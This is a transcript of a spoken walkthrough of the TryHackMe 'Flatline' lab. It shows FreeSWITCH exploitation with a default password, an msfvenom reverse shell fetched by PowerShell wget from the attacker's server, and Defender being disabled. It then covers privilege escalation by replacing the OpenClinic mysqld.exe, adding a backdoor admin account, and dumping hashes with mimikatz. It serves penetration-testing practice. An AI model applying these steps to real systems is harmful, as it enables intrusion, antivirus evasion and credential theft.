So welcome back. Haven't been streaming about 3 months, but we are back streaming again. Saw this box when I was actually gone, sitting in a hotel room. Saw this box right here, Flatline. Thought it was new at that time. Showed you how long ago I was in that hotel room because there's like 10 boxes from it now. We're gonna go ahead and try to do this guy. Don't remember how to do it. I'm sure we can figure it out again. CD in desktop. Try hacking, right? And we'll make a directory called Flatline. Alright, cool. Let me get that a little bigger for you guys. And let's go ahead and start off with an mmap scanner, right? mmap, tac, tac VV for very verbose, tac T4, timer to 4, one above the default, which is 3, tac-n, no DNS lookup, and do not ping. Alright, and we'll go ahead and we'll throw in the IP address like right there. And we immediately get back port 3389, so that makes me think it's a Windows machine, like right there. We're not seeing anything else just yet. Since we're getting a port that's high, I'm going to go ahead and run a rust scan at it, just because that's a pretty high port. So I want to see, hey, is there anything above that? 8021, alright, let's see what that is. 8021, TAC-C, TAC-SV on the IP address. Go ahead and stop that rust scan like real quick, just so I don't beat up the box too much. TAC-PN, saying that the host is down, but we also didn't tell it to not ping it. Free switch event. Alright, the only logical thing to do from here is search for free switch. Search for free switch. Alright, looks like we got two things here. We're not getting a so we don't know if it's command execution or metasploit. We do know that it's going to be a Windows machine. We got 3389 up here, which is telling me that, hey, this is 9% sure it's a Windows machine. Let's go ahead and hop into MSF console, tac-Q, and we'll also grab this link right here. Let's go ahead and do a CD into what was that guy called? Free Flatline. We'll CD into Flatline up here also. And what I want to do actually here is actually exit and then CD into Flatline. Okay, thank you very much. CD into Flatline, and then we'll go back into that metasploit like right there. Let's go ahead and search exploit. TAC-N. Whoopsie daisy. Search exploit TAC-N. Ah, I did it again. I keep pressing the wrong thing. There we go. Okay. And so we search exploit that. Let's go ahead and I guess we can just cat that 477.99.txt, and then up here we'll also look for free switch. So let's go ahead and search for free switch. And we did find something. We got an exploit like right here. Excellent. 2019-11-03. Let's go ahead and use 0. And right now the payload is configured to a Unix payload, but we're like 99% sure this is going to be Windows. Let's go ahead and set payload. Let's see if they can do some Windows stuff. Command Unix. So right now, no. Do we have any Windows stuff on here? Let's go ahead and show options. Let's go ahead and set our L host first. So password says clucon. I wonder if that's like a default password. Let's set our local host to ourselves. Right. Set our R host to this guy over here. Right. I feel like I should be able to set our target maybe. Okay, set our target to Windows in memory. I think. Windows in memory, and then we'll do set payload. Maybe I can change payload now. Okay, there we go. Let's change the payload now to maybe PowerShell reverse TCP, and show options. Make sure I don't do anything else. Load modules. We don't really have to load anything. Maybe we could always do a. If this PowerShell module is separated by account and download over the web, we could always do a like a power view or something like that, but I feel like we don't really need to load anything. Let's go ahead and run that. Let's see what this guy says. This guy also says password clucon. Alright. Login success. So okay, so the password we're thinking is clucon. Alright, and we didn't get anywhere though. We'll try a couple other payloads up there. Let's see here, exploit.py, blah blah, who am I? And it's showing, okay, how's it doing that though? From socket import, missing arguments. Free switch, exploit payload, the target, and the command. Okay, so this guy's obviously got to be a .py up here. Address, system, okay, blah, blah, response, format, password, UTF, 50, Because pretty much we can log in with it with ClueCon and pull information off of it is what we're seeing here. Command execution. So let's go ahead and change this cat file, like right here. There's a text file. We're just going to move 47, or we'll copy it. 472, we'll copy it to, let's say, freeswitch.py. And then I'll go ahead and do a Python freeswitch.py for, let me see here, what do we want to do now? We want to go ahead and run the IP address and then a command on it, like who am I? So let's go ahead and try that. Let's see if we can take multiple commands too. So we'll do that, and then who am I? That's Python 3. So that's authenticated, so login is successful. So we're thinking the password most likely is ClueCon. And it shows us who we are. Can we do multiple commands, like who am I, hostname? Can we do something like this, where it's just multiple commands combined? Like, is it going into command prompt doing it? No, okay, error, no prompt, okay. Can we wget stuff? Can we do that? Is that even a thing? Authenticated. It's not saying it's denied. Here, let's try to start a payload to something else up here. We can add a user maybe. Command Windows generic maybe. Command Windows reverse PowerShell. Didn't we just do that one? PowerShell reverse TCP. I feel like we just did reverse PowerShell, right? So let's go ahead and set the payload to this guy now. Show options. Load modules, blah, blah. Let's go ahead and run him, I guess. 821, that's correct. SSL's false, as far as we know. Then down here, we're going to try to do some more stuff. Let's go ahead and try to MSF Venom, right? Windows shell reverse TCP, L port 999, L host, we'll go with myself, right? So I gotta do a quick ifconfig, see who I am, right? 10.13.26.184, make an executable, shell.exe. Alright, that all looks good, like right there. We'll go ahead and we'll start up another guy over here. Actually, I'm going to start him up here, never mind. So you guys have a better view of it. We'll go ahead and do an nc. Yeah, start up another thing down here. There we go. We'll do a Python 3 tac m HTTP server port 80, and we'll start up a listener up here, and we'll see if this guy gets to 200 from a wget over here for shell.exe. Right? That's what we're going to try to find out like right now. So we're going to see if we can do command over here, because we did wget, it didn't say anything bad about it, right? But when we did the hostname one, it did say error no reply. So I'm thinking that wget does exist. So I don't know if we are using PowerShell. I don't know what we're using here. But let's go ahead and do it. Wget HTTP our IP address, right? Shell.exe, right? And tac out file, I would think, because I would think we got to do some of that. Shell.exe. Could we do that? I don't know, because this guy's saying PowerShell, things like that, right? So I'm thinking it's like a PowerShell type of directory, or go in here, or something like that. If not, maybe we have to do like a PowerShell, then quotation mark something. Let's try to do a dir now, and see if we can see anything that's in there. Because we didn't get anything over here, did we? So that wget did not work, did it? No, it didn't. Okay, so let's go ahead and do a PowerShell that, or can we just do a PowerShell? Yeah, that, right? Then wget, right? Hopefully it's able to do that. Our file is going to be shell.exe. Can we do that like right there? We're still not getting anything over here saying that, hey, someone connected to us. So that's not good. Supposedly we did authenticate though over here. seems to be taking a minute. So I wonder if he is running a PowerShell command. Let's go ahead and show options up here, or show payloads, I guess. Set payload. And we'll just hit tab twice to let's try another one here. So we got it that time. So that PowerShell wget did work because we got it. See, 10.10.39.85 connected to us, and it got 200. So that does work. I wonder if we can see that DIR now. Can we see that now? If it's in there. Okay, so we're not seeing anything there, but the content link 2392, I believe it's bigger. 2392, it was 2346, now the content link is 2392, so I feel like it's getting bigger, the directory, right? I think that that's a good sign. I feel like we put something in there. Let's go ahead and, I guess, try to run it. We have our listener up here, right? We made that MSF Venom file, right, up here. We start up a Python server. We think we brought it over into there. We're pretty sure because we definitely got 200 over here. So we did a PowerShell, and then we told it to do a wget tech out file shell.exe. We didn't get any errors over here. We got 200 over there. So let's try to run it. And I feel like it's going into command prompt and not PowerShell. So I think what we need to do is just shell.exe. I feel like it's going to command prompt, not PowerShell. And we get it, and we 100% are in command prompt, not PowerShell. I'm going to do a DIR. Let's go ahead and do a PowerShell. See if we can get a PowerShell from here. Just kind of want to see. It's not looking like it, huh? That's okay. Let's go ahead and we'll run that again, but this time we're actually going to do a use exploit multi-handler. And we will set our payload to be a Windows. Let me see here. What do we have for Windows shell? Windows shell reverse TCP. Set our L port to be 9999. Right. So our L host to be ourselves, right? And we'll go ahead and run that. Okay, we'll have that running like right there. And from here, what we'll do is we can go ahead and stop this over here and try to run that again. And we get our callback like right there, right? Awesome. So now let's go ahead and background that and search for shell 2. And let's go ahead and use 0. Shell 2 interpreter, set session to 1. Run that. And hopefully you get an interpreter session out of it. If not, though, I do have an idea. If, like, let's say, what is it? Firewalls, some of that are up. I do have an idea. We can try to. Okay. That's okay. I think let's try to do a set MP preference for set MP preference. Set MP preference true. Set MP preference is off. True for Windows real-time monitoring. Set MP preference. This is what I want. No. I want to turn off real-time monitoring is what we want to do. Let's see if we can actually find out. Real-time monitoring. Disable real-time monitoring. And I believe I just said that's true. Is that correct? I think I do set MP preference. Tack that true. Is that what I do? Let's go ahead and go into command prompt. Or let's go ahead and do this another way. Actually, let's do sessions 1, right? I can't get to PowerShell from over here, right? I don't know what the hell this is like right here. Is that a flag? What are you? I cannot get to PowerShell, correct? That's not even the correct command. Damn it. It'll be more fun is if we, let's try to actually, because I want to get into PowerShell for this, but I mean, if I can't, I can't. Whatever. Let's go ahead and see if we can actually set the payload to Windows PowerShell. PowerShell reverse TCP. Show options. Let's go ahead and run that. And let's go ahead and do an MSF Venom over here for the same thing. Windows, it was PowerShell. PowerShell reverse TCP, right? Just have to put the power at the beginning, right? Yep. That's all I have to do. We'll just call that shell.exe again. We'll go ahead and re-upload that. Just see a 200 over here. All you gotta do is run it. And then we should be on the box. Now I want to get to PowerShell so we can disable antivirus, we can disable real-time monitoring, things like that. That's what I want to do. That's why I'm working so hard to get to PowerShell. If we can't, we can't. It'll be okay. We'll try with command prompt, I guess. But I would just like to get to PowerShell, that's all. I feel like it will make my life a lot easier. Still waiting for that guy. Or maybe I should name him something different. I don't know. There we go. He got it. Okay, cool. So he got it. You all done over here? So you kind of pretend like you're done? Okay, there we go. I was about to shut you off anyways. And throw a shell at it again, and we'll see if we get something up here. I wonder what is happening here. Okay. Oh, there we go. There we go. Okay. I was like, all right, we'll just make a command prompt again, I guess. Looks like we're doing this through command prompt. Looks like we are not doing this through PowerShell. Now does it? Looks like we are 100% not doing this through PowerShell. Looks like we're going to be doing this all through command prompt, and that is okay. We'll go ahead and we'll PowerShell session 3 open. Let's see. Let's try to do a shell to interpreter. We can always try that. Set session 3. Nope. Nope. Kind of want to send commands at it, but can't even talk to this freaking thing, you know. Okay, so we can talk to it. There we go. Okay, so let's go ahead and do a set. There you go, away. Oh, my interpreter actually opened up too. There we go. Okay, cool. So we may not actually have to do that set MP preference, but I'm still going to show you guys it. So it's going to be set tag MP preference. It's going to be a little set tag MP preference tag disable real-time monitoring, and that's going to be true. I think that's how I do it. I think that's it. We'll try that first, see if we get any errors. Nope. Disable real-time monitoring to true. Set for disable real-time monitoring false. For disabling real-time monitoring case it is enabled. Set for disable real-time monitoring to true. Yep. So there we go. So we just disabled real-time monitoring, right? There's also another one. Set MP preference, and that's going to be disable IOAV, IOAV, I think. Monitoring, and that's also going to be true. Might not be. Let me try IOAV. Disable set preference off true for IOAV. I think it's IOAV. Might be IAOV or something like that. Real-time protection, cloud delivery. That one I want to look up again. This is the IOAV, yeah. That one I might have to actually look up again though. I wonder if it's actually in, that's 100% all in Japanese. I can't read a single word of that. No, I'm not that good. Control F, IOAV. Disable IOAV protection. There we go. And we're going to put that to true. That's not going to work. Set TAC MP prefer. Disable IOAV protection to true. Alright, and that should be now everything's disabled. Now I start searching around this guy and try to find different things. We did get that interpreter shell also, so this guy's moving a little bit slow. Probably should go to that. Sessions TAC I. Let's see here. We have session 4, right? Just want to get UID. We still get system flags right here. That'd be sweet. We can always try it, right? Also want to load up Mimikatz, things like that. And we did it. Get UID. And we are into authority system. Okay, let's see if there's... I did not do that the first time, so let's go ahead and see what else we got. Let's go ahead and hop into a shell first. Alright, we'll see what else we got here. Yay, I did it. Didn't even go with the shell. Okay, let's go ahead and CD and C drive. We'll start there, right? Start from the C drive. We'll start to work our way up, right? Directory. We got cycleman.settings, blah blah blah. Search recovery, blah blah. System projects. That's a new one. Projects. That's not a normal now, is it? CD into projects. See what we got in here. Open Clinic. Thing's called Flatline, so that actually makes sense. Open Clinic, CLI, NIC. Start to search for stuff also. Clear that out. Search exploit. Open Clinic. Okay, that's a real thing. Local privilege escalation also. Okay, PIR. And we have a bunch of crap in here. Alright, let's go ahead and read this guy over here. Search exploit. TAC M. I'm going to read that guy over there. Alright. We don't need this up here anymore. Clear that out. We can go ahead and cat that over here. What we got here? It says by default the authenticated users group has the modified permissions to Open Clinic folder files shown below. So let me guess, we're going to change the name. Impact service, any low privilege users can elevate the privilege of using MariaDB service. Okay, so see project Open Clinic MariaDB bin mysqld.exe. So we're probably going to change that to something of our choosing. That's what we go with. Aren't we? We can probably stop this over here also. And we'll start this off. MSF Venom. Jesus. SF Venom. VNOM TAC P. Probably just do a Windows shell reverse TCP if we want to. Well, let's do that like right there. We're going to call it out something else. Not going to be shell.exe. We'll call it Mariah. Probably got to change it to the exact name, don't we? Let's see here. Proof of concept, generate that. Yep. And he called MySQLD evil. MySQL D tech O, MySQL D evil. Then he changed MySQL D.exe to MySQL D.back. Then he changed MySQL D evil to MySQL D.exe. So we're just going to actually change it to MySQL D.exe. We're just going to start that from the beginning. No point in recreating the freaking wheel here. And we're going to cd into there. Projects PROJECTS / open clinic MariahDB bin. Is that a place? Yes, it is. Cool. And we have MySQL we're looking for, right? MySQL D.exe. So we're actually going to rename MySQL D.exe to MySQL D.back.exe. Okay. Rename. I think it's actually right. Is that to rename? Crap, I have to go into the shell for this one. Isn't it? Let me in a damn shell. Okay, can you guys like rename something like this? Starting to piss me off now. I got a better idea. Control Z, yes. Control Option or Sessions Tag I. See, interpreter isn't always better. Sessions 3. CD into there, pretty much. CD into there. Why would you abort session? No. Aborting session. Thank you. Okay. What is this thing fucking doing? This thing's acting fucking retarded like right now. Okay, CD into there. dir. So let's go ahead and rename this. Rename MySQL D.exe to MySQL D.back.exe. Let's go ahead and wget. I'm not going to try to freaking use Metasploit or Interpolate right now. Let's go ahead and we are going to, that's not even close to correct also. Not the right IP address like right there. Let's go ahead and do an ifconfig 10.13.26.184. Okay. Let's go ahead and make a Python web server. Python 3, right? Boom, boom. Okay, we got that up there. Let's go ahead and wget HTTP. God bless almighty. There we go. I have not used this keyboard in a very long time, if you can't tell. There we go. Slash MySQL D.exe. Our file is going to be MySQL D.exe. What happened? Why can't I do that? Wget. God bless. Alright. This thing's giving me agita. There we go. There. Thank you. Okay, cool. So we got MySQL D.exe. What port we're listening over here? 9999. Of course we are. That's not going to work either. Let's go ahead and do 4242. And we're going to delete MySQL D. We're going to go ahead and do that again. So we'll go ahead and do that same exact command again, because we need to be on port 4242. Because 999 we're already listening on that port, so that's why that one's not going to work. LVMP 4242. Now we have to start and stop the service, which I believe is SD stop open clinic. I don't know if that's actually gonna work. Okay, that did that just work? SC start open clinic. Can I just like start and stop the service? I don't have all my CRTP nodes on this computer. I don't know if I can just start and stop the service like that. This guy's listening over here. I don't know if PS actually shows me services that are running. No, it does. Okay. Is Open Clinic a service on here? There's Free Switch. Doesn't say anything about Open Clinic yet. We're definitely gonna have to like restart the service though, or restart the computer. How to restart a VM? How to restart a VM from command line? Okay. Yeah, it's like shutdown/R, right? Or shutdown TAC R. Is that all it is? TAC R tells the Windows to restart. Says they shut down. Okay, is that it? Just restart system. Okay. So PowerShell, just restart computer. You try that also. I don't think that what I actually did today. Restart computer. Let's try that. So I should lose like connectivity obviously over here. It's probably gonna take a minute, and then we'll get something over here. I think. I don't really know how the VM's gonna work here because it is a VM. So I don't know if it's gonna restart this guy over here or how that's gonna work. Like right there. But hopefully it starts up at some point. Okay. I mean, obviously, there we go. Okay, so we're starting to lose all the connections and everything. We have 4242 running over here, so hopefully that gives me something. It's just a Windows shell reverse TCP, so nothing fancy. So I could have done it in here also if I wanted to use exploit multi-handler, and I could have set the out ports 4242, then they would run tag J and had that running in the background, right? Something like that, okay? So it'd be running in the background except for on port 4242. But I got it running over here, a listener. And we'll see if this thing actually restarts or not, I guess. Probably could take a minute or two, huh? They call it mysqld.exe. Okay, cool. That's what I was supposed to call it, right? mysqld.exe, yeah. Okay, we just get the other one and we change it over to back. Okay. Restart the victim machine. Reverse shell attacking machine opens. And we were already kind of... Oh, okay. Oh, that one just died finally. Okay, never mind. Thought I had something. I don't know why. Oh, and we do have something. Okay. Alright. Who am I? It looks like I am IT Authority or some type of admin because I started right off the C Windows System 32. And we are... Who am I? Alright, and we obviously we got a call back. Okay, IT Authority System. Let's go on CD in the C drive. CIR. I got CD into users, probably administrator or something like that, right? CD into administrator or maybe Codic, I don't know. So you have two different files in here, maybe in the desktop. Oh yeah, we got root and the user.txt. Alright, cool. So we got that, right? So we're done with all that stuff. That's cool. Just want to load up Mimikatz. Try to load up Mimikatz. Let's go ahead and type in Mimikatz, or let's go ahead and locate Mimikatz PS1. Okay. Do I not have that? Mimikatz.ps1. Is it Mimikatz? Let's go ahead and download it. Mimikatz PowerShell. Invoke Mimikatz, right? View raw. Okay, we're just going to go ahead and grab this whole thing, right? We're just going to start from the top, right? And we'll say, hey, we're just going to shift and all the way down, right? Shift page down. Hold that guy down. There we go. Whee! We're just going to literally just copy and paste in all honesty. That's what I'm going to do. Control C. Boom. Go back into here, and we are going to say that we now have a Mimikatz.ps1, right? So we're just going to do a sublime text, invoke Mimikatz.ps1. Control V. Now I care about doing that. That's fine. Control S. And we'll exit off here. So now we have an invoke mimikatz.ps1 file. What we're doing here is we're going to actually hop back into a PowerShell. And we're going to try to invoke mimikatz. See if we can try to track attach something like that. See if first off we even can get a PowerShell. That's a real question first. If not, we know how to. Alright, seems to be working a little bit nicer for me. Let's actually start off first with an AMSI bypass. And I am actually going to be going through all this stuff. We're going to have another like red teaming class thing where, we're going to do a whole bunch of different stuff and a lot of Windows hacking, things like that. So pretty excited to start bringing that out. But yeah, this should be a good time. Let's go ahead and wget. Let's do a AMSI bypass first, and we're doing this the real way. All right. I just need one. Original AMSI bypass, base 64 encoded AMSI bypass. We'll try that, huh? Really just start to mess with this thing, huh? Now it's like an AMSI trigger. Here's an AMSI bypass right there. I just want one, that's all. Say something that works. I got one on my laptop that works really good. So I just want to try to find AMSI bypass. That's patching technique. Don't really care. Don't want to patch it. Want to break it. Like I said, I got a really good one on my laptop. Seems to work very, very well. I'll probably just actually email it to myself, and the next time just, hey, this is AMSI bypass, throw it on my GitHub or whatever. Something like that. I mean, here's looks like a good one as long as I can actually get to it. This looks like a good one. But I'm not able to like copy and paste them. Usually you can copy and paste some of that. There we go, AMSI bypass PowerShell. What's this? What we got here? I don't really need to download anything or invoke a web request or anything like that. I don't really do all that now. Alright, I'm gonna grab the one off my I'll just grab the one off my laptop and we'll just use that one like right there. I'll email it to myself or something like that in the next couple days or whatever. You guys will see it though. And I'll throw it on GitHub or whatever. I forgot where I got it from, but it worked great. So what we're going to do now is let's go ahead and let's wget that mimikatz. I'm going to make another Python file, right? Python web service there. It's going to do a wget http 1013. Whoa, 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 whoa. Whoa. 1013 2624 24 / invoke mimikatz.ps1, right? Track out file. We will make that invoke mimikatz.ps1. I don't think we actually need to do anything crazy with antivirus or anything like that. Okay, he went ahead and got him. Could always try to run a add a user also and run what is it? Our remote desktop, because we did have all that stuff, so we could try to do that also if this guy's going to actually work again. Alright, cool. So let's go ahead and do a dir, see if that's still in there. If it's still in there, we know that antivirus didn't do anything. Okay, it is. So let's go ahead and do a period / invoke mimikatz. Alright, whoops, invoke mimikatz.ps1, excuse me, period / invoke mimikatz.ps1. Then we'll type in invoke mimikatz tac dump creds, I think it is, or is it dump cred? Might just be dump cred. Invoke mimikatz dump cred. Huh. Cannot call a method of null value expression. It does not like that at all, does it? It does not like that at all, actually. Let's try invoke mimikatz. Did it not allow us to run that invoke mimikatz in the first place? Did I do it the wrong way? Whoopsie daisy. It's not allowing us to do that now, are you? Okay. Can I find an overload for git delegation? You know why? It might also be because It's like no domain control or stuff like that, but should still be able to dump the credits. So that doesn't make any sense. Just go ahead and try to add a user and then to a net user Ryan, password 123 exclamation point / add. We do that. Okay, that completes successfully. Cool. All right. Net user. Whoopsie. Net user or net local group. Local group. Administrators. Administrator / add Ryan. We do that. Okay, that's completed. Net local group. Remote desktop users / add Ryan. And then we'll pop up on a remnant over here, and let's go ahead and grab that IP address right. Copy that. Boom, boom. Control V. Okay, and we'll try it for Ryan, I guess, because 3389 we know is already good. Okay, net local. Oh, I didn't spell local group correctly. Now I'll do that. Net local group. And if you don't remember local groups, just so you know, you type in net local group, hit enter, and it'll actually bring up all the local groups and everything. So if I want to just hit enter, then I can just copy and paste remote desktop users, just so you guys know. Quick way to do it. So now we can do a net local group Ryan or / add Ryan. So now I'm in the administrators group and also remote desktop users, and I know my own password. So we'll set that certificate, we'll say Ryan, and we'll say password 123 exclamation point, which I think I just typed it in wrong, but we'll go ahead and we'll try it, and we'll see what we get from there. Also, this video's been done too, so you know. I don't know how well this remote desktop is actually going to work now that we're trying it, just because you know, this box I don't think was made to be remote desktop into. Okay, it can't connect to it. It might just be because it's so slow, it might not be able to connect to it in all honesty. Ryan, and we'll do PASSW0RD 123 that. Caps lock has been on that entire time, so PASSW0RD 123 exclamation point. And it might just be too slow to even run this. And it looks like we're getting somewhere. Come on now. You can do it. But yeah, whenever we do the PowerShell hacking stuff like that, we will be using just my local. I'm gonna build like a little local server stuff like that. We're not gonna use the same ones that we used before. But yeah, we will have few local servers, domain controller, and we're gonna be doing different stuff. Kind of pretty much going through the same stuff that we did with what was it, PMPT prep, but we're gonna do that with all PowerShell. So we're gonna use invoke mimikatz, a lot of the niching stuff. So we're gonna use invoke mimikatz. We're gonna do Kerberos on PowerShell, asrep on PowerShell, all that stuff. The only time we're really ever gonna use Kali Linux is for John the Ripper, which I can actually download that onto Windows. We probably will not open up Kali Linux for like, you know, a week or two and just go through all those different things. Just have fun with that. Constrained delegation, unconstrained delegation, PS remoting, all that good stuff. So it should be a good time. Plan starting that later this week. Still gotta make the domain controllers and everything for it, the servers and stuff. And what time is it like right now? 9:30. All right. So I don't have too much longer here. Let's go ahead and try to open up PowerShell. And we'll see if we can actually invoke that mimikatz. And if not, it's really whatever. I mean, yeah, you can connect to that network. Go for it, big guy. And if not, I mean, you know, it's... Oh, you know what, though? We never actually opened it up in Administrator. Now, did we? We just opened up PowerShell. Let's go ahead. Now we're in this guy, and they're like swimwear. Go ahead and just open up PowerShell with administrator privileges, since we do have those. Right click. It's actually going pretty good. I thought this could be a lot slower. It's actually not too bad. I mean, server manager's not responding, and now I said that command prompt's no longer responding, so It's going good though. It's actually going pretty quick for like try hack me with something that's not made to remote desktop into or not needed to remote desktop into. This is actually pretty amazing that we even got this far. So we will right click on you. I don't know what command prompt's doing its own thing. We will right click on you. Yeah, we may not get anywhere with this. Doesn't mean I'm going to quit. Oh, more? Runs administrator. No, don't go away. Okay, runs administrator. Bam. It's going. It's doing its best. And snap into console. What is going on here? I don't know what that even means. I'm just trying to run this as an administrator. Go away. I don't know what you do either, command prompt. You're just sitting there blinking. I'm just trying to get Mimikatz up and running. I'm not doing anything too bad. Now, could we get this through a server session? 100%. Yes, we could. I mean, we're also, well, we did not load it into memory, but we could have actually done a invoke web request and loaded Mimikatz into memory, you know, and then made it even more stealthy, things like that. We didn't for this one. Like right here, we obviously put it on the system itself, but, you know, that's okay. Why is event viewer open? What is happening to this machine? Okay. Yoo-hoo. Is this PowerShell actually? Windows PowerShell. Okay, thank you. That's all I wanted. I didn't want too much from you. That's all. It just said to enhanced. Thank you. So administrator of the organization doesn't know that I just became the administrator. Mwahaha. Alright, so we are getting somewhere. Hopefully you can see that on the phone there or wherever else. Hopefully you can see that like right there. And yeah, it's not quite reacting just yet. We're getting there. We are getting there, but we don't have anything just yet. There we go. Okay, cool. Let's go ahead and do we're gonna CD into. Oh boy, this is gonna take a minute. It's going real slow with my actual commands there. So we may, I keep saying we may not be able to do this, but we are going to give it our damnedest shot here. Let's try to, oh boy, okay, we got the C drive, okay, C. Are we going to get a D in there? CD. Okay, we got CD that. Let's go to users. What was it? It was Nish whatever, right? His name started, yep, okay. Desktop. dir. Let's go ahead and do a period slash. Whoops, that's not what I want to do. Can't mess up it right now, Ryan. That's literally the worst thing you can do possible. Because you're going to be here for days fixing it. Days fixing it. So, we will get there though. If anyone's actually writing anything, I can't actually see it right now. My phone died. Oh god, I broke it down. Okay, cool. So let's go ahead and do a period slash invoke Mimikatz, right? Enter. Okay, then we'll do a invoke Mimikatz, and we'll see what happens. Wow. Okay, we're getting the same thing over here also. What is going on? Why can't I get anything on this guy? Is it because of the net framework, maybe? Man, we really broke it that time, huh? It's broke. Is it because of the net framework, I'm wondering? That could be it. Could be the net framework. Could be a lot of things actually. Why it's doing that, I don't know for invoke mimikatz, but seems like maybe the net framework, something like that's wrong. Let's try to do the .exe, I guess, just to make sure that. We'll go ahead and we'll locate mimikatz.exe. We'll go ahead and throw that, copy that into here. Alright, and we'll go ahead and try to do a wget for that guy. It's already on here, wget http 10.13.26.184, right? Slash, what is that thing called again? What I'm trying to do here? Mimikatz.exe. Mimikatz.exe. Tag out file. I gotta slow down like a little bit because I can't see what I'm actually typing in anymore. But out file is going to be mimikatz.exe. And hopefully we can go with something with that, right? Hopefully. Hopefully. Okay, where you at? No, it's not. Okay. Might just give this guy a, hey, we're done. Nope, it's still going, huh? Yeah, I might just have to give this guy a, hey guys, we gave it our best shot. I got one last try here. I got one more idea. Go ahead and restart it, huh? Go ahead and restart this guy. Pretty much the same thing that we did before. We're going to try a little mimikatz.exe over here and see if we can actually just get the executable going. Like privilege debug and then like an LSA dump, LSA / patch or whatever, something like that. And I just really want to try to crack like that one dude's password. Could we do an interpreter? Could we try it like that? Yes, we could. But let's try it other ways. Alright, we don't always have to use interpreter and metasploit and everything like that. So we're going to restart the system. Yes, I am back. Oh no, that's fine. Thank you. I think I'm already on there though, on the InfoSec streamers list. Sorry for getting back to you so late. And my phone's not up right now, so I can't see anything. But just restarted that guy over there, right? So we should have lost in Remina. We did this once before. This is just like when we restarted before, when we did the shutdown TAC R. So we should see a callback over here. That callback will then be able to load up mimikatz hopefully, and we'll go from there. If you were just watching this video just to complete that box, we were done an hour ago. So, but if not, if you want to actually see what goes in all of it, then yeah, there you go. Come on now. Took about a minute and a half last time, didn't it? I think it took about a minute and a half last time also, so take a minute and a half this time, 2 minutes maybe. So got somebody real quick. Okay, I am connected. Probably connected a minute ago, but I just saw it now. Okay, cool. I'm gonna do it at dir. Let's go ahead and cd into the C drive, users. I don't know how to say that guy's name. Acrotic, cd into there, cd into desktop, and let's go ahead and do a PowerShell. Then we'll do that. Then we'll do wget. Actually, mimikatz.exe should already be in there, or no? No, it's not, is it? No, because let's go ahead and do a PowerShell. I wonder if we got to attack EP bypass, some of that. But no, let's do PowerShell. Let's try it. We're trying to invoke mimi cats one more time at PS1. I wonder if I have to do like a execution policy bypass first. I wonder if that's the problem. Maybe. Hopefully. Dear God, I really, really hope so. If not, then sorry. And we'll try to do an executable one. Sorry, but not sorry at the same time. I don't know. I don't know what I'm trying to say here. There we go. It takes forever whenever you're in command line for PowerShell to open up. You always wonder, like, did I break it? Is it frozen? Does it hate me? Do I hate it? I really just want to get that one guy's password. Alright, cool. So let's go ahead and try to do that again. That's not going to work right there. See if that works. Nope. That does not work. So I guess we'll try, what are we thinking, LSA dump? I should not have done that, should I? Alright, we're about to say screw it, because, no, because I have Ryan on here, don't I? So can I do evil win RN? Evil win RN, right, okay. So tag P is going to be password, 123 exclamation point, right? Tag U is going to be Ryan. Let's try like this. And the box IP is 10.10.39.85. To try SMB exec or PS exec over here also. I don't think that 445 is even open though. That's not going to work also. I don't think it's going to work over here. We've already got something. And I can't do like enable PS remoting or anything like that, right? That'd be kind of insane, wouldn't it? So yeah. That's what I thought. Alright, well, I'm about to quit because I had to press Control C. I backed out of it, and which then, how am I going to get in this guy? There's another way in. We can't always just, ooh, there is another way in actually, isn't there? That is another way in, isn't it? There's exploit multi-handler. Windows PowerShell reverse TCP. Now step payload. I think that might be the payload for it, or was it an interpreter payload? What? I'm already in this guy? I don't think so. That would make no sense. Okay, cool. There we go. Do 0. Whoops. Set session to 5, right? We'll run that. This guy's not going to work for me over here. Going to session 5. We're in PowerShell like right now. Let's go ahead and wget mimikatz.10.13.26.184. Right. Our file is going to be mimikatz.exe. Is that going to work for me? Okay, got mimikatz over here. I gotta fuck off. I don't care. Okay, I'm sure we have mimikatz. Can I just go into command prompt like that? Yep, there's mimikatz right there. Can I just go into command prompt? Cool. Session 6, I guess. Can I go into command prompt? I can't go into shell from here. Okay. Can I run mimikatz from here? Where am I even in here? It has no idea what's even going on, does it? Exit out here. Run that again because it had no idea what the hell is happening. Whoops. And let's go ahead and come on, run. Set all port to 4111. Run it. Get out of my way now. I have like a run tag J with this thing. So get the hell out of my way. Let's take it too long. This is taking too long. Alright, what I did like right there was I killed all the other jobs and everything because they were pissing me off, and it wasn't able to do what it was supposed to do and stuff. I wasn't able to connect back to me and everything, so that's what I did. I just killed everything. I was trying to get a shell interpreter up and running. It didn't want to seem to work, so now I'm just trying to send it back to there again, just to, hey, go ahead and do shell.exe again. Open up another Python PowerShell session. Okay, cool. We're gonna. I wanted the background just that, but I guess I couldn't just do that like right there. I should have did a run tag J, I guess. Okay, that guy's taking forever. Everything's taking forever now for some reason. I'm going to do a sessions tag I, see if this actually went through. It did. PowerShell win. Let's go ahead and search for shell to interpreter again. Use 0. PowerShell also open up session 8. Sessions, or set session to 8, we'll say. We'll run that. Usually it runs a lot faster than this. I don't know what's taking it so long. Usually either it's able to do it or it's not. Sometimes it is, and they literally do it a minute later. It's not for some reason. Let's go ahead and go into session 7. And we're going to go ahead and run that mimikatz, because we should still have mimikatz in here. Mimikatz like right there, so let's go ahead and run that. Or actually, there we go. Just, there we go. Session 9. There. Shell. Can we get into a shell now or no? Because last time I wasn't able to. Okay. Can we do mimikatz.exe? Can we do this now? Okay. Can we do a privilege debug? Okay. Thank you. Now can we do a LSA dump or LSA dump, right? LSA, is it LSA dump, that LSA slash patch, is that what it is? Okay, there we go. Now here's our NTLM password, right? That's our hash right there. That's what we want to crack, right? Let's go ahead and go into John the Ripper now. Let's go and do a John, or actually do a nano pass.text. Okay, and then we'll do a John text wordless through rocky.txt, and will be for pass.text. We can do a fork of 4, and the format is going to be NT, because that is an NTLM hash. Let's see if we can crack his hash. Alright, doesn't look like we can now. Alright, so this hash is not within Rocky.txt. I'm sure if we have a long enough word list, we could finally crack it, right? However, is my hash even in there? I did pass.txt and I not hash.txt. So what the heck? I don't think mine, yeah, I don't think password is even in, password 123 exclamation points even in that. Okay, let's see if the administrators is in there. Which he looks like he actually has the same exact hash as this guy right here. So it's most likely the same exact password. So isn't going to be in there either. Alright. This shouldn't be in there. This shouldn't even be a thing. Like right there, but hey. Alright, so we're not able to get into any of them. That's still okay. We don't know what his password is. That's alright. Okay, that's literally all that. Just to be able to figure out that Rocky.txt did not have his password in there. I thought that would be something cool, be able to crack it and get in as him, but I guess we're not going to be doing that like right now. Now we could do a, depending on what my privileges are like right now, we could also change his password. So we could just do a net user necrotic. Net user necrotic, and we could change his password. And a command complete successfully. So now we should be able to actually get in as him. We can actually do this, you know 